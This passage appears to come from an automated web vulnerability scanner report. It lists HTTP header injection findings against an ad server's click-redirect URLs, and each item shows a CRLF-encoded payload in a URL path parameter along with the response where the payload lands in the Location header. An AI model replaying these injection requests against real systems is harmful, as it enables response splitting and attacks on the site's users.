User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:04 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/db4cb
91914b3fee4
/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.9. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 17 is copied into the Location response header. The payload 519bd%0d%0af6f1a5ca6fc was submitted in the REST URL parameter 17. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/519bd%0d%0af6f1a5ca6fc/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/519bd
f6f1a5ca6fc
/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.10. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 18 is copied into the Location response header. The payload 8383b%0d%0afea7a730776 was submitted in the REST URL parameter 18. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/8383b%0d%0afea7a730776/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:51 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/8383b
fea7a730776
/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.11. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 19 is copied into the Location response header. The payload a51c3%0d%0a7eebecdec02 was submitted in the REST URL parameter 19. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/a51c3%0d%0a7eebecdec02 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:45:08 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/a51c3
7eebecdec02

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.12. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 591e6%0d%0a985b0b0017d was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/591e6%0d%0a985b0b0017d/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:44 GMT;
Content-Type: text/html
Location: 591e6
985b0b0017d
/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.13. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 83775%0d%0a107c0b40884 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/83775%0d%0a107c0b40884/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:40:59 GMT;
Content-Type: text/html
Location: http:/83775
107c0b40884
/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.14. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload f3296%0d%0a30ce56375d6 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/f3296%0d%0a30ce56375d6/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=asnEV8xZduBwoApTwrxUjYrtQJqXsQZaZb6fZbVxooN01mQOFIJFMXPVMoxcmDomur8rVZdZdyuy0WcfT1gSx9ZaZcvbZbSMD8ZaDH4CZc0gemFHZa4ibQGZawTwQBjZaM05ZacZcP6hZdQw36kCJBsZdfoQ0cBHMnaXZblEwlwbQRN8urCV7Hu8RYAjZdwb7ZcrYPDHeuoxqlWyZcy1MCslvROE9AfMtngmyQCusZdfGac2XS4kqXjxPFj8rhO5UBbslSADP8ZcstcsZdvkM3ZcI7SQLhwnnZaPN9lBjckZb5WkGmoGxqNDFiRIDa6pXLUm4ZdX7pv0b4frnccrY8a7chpILDHWbZbpXBUgHxZc5uRKV6X8JoR359t3iB72knGnQD9niT68ZbW8PXlEMMidjluW5qSJNe4nbXil8FWRfF1Jdt8Dr6WWQSmKthvdjamtFnZdYHZabaaq5IkJ1ywJQROkLZcZbIWWe2fuuggNpQ6fP0yIdQmf4VcZaqb28lsVMwFgtpkXwMkEbgqZdVH6R2kYt8F5UYXAShmhMA91tBZb6Srm6K5sCQ3OmkSZcOQuFO9VTFZdPpyVGjvwU37Yr6SmUbKjINBMD; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:16 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/f3296
30ce56375d6
/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.15. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload e3982%0d%0a98884cd2344 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/e3982%0d%0a98884cd2344/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:29 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/e3982
98884cd2344
/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.16. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload a276f%0d%0a361444f8735 was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/a276f%0d%0a361444f8735/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:41:45 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/a276f
361444f8735
/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.17. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
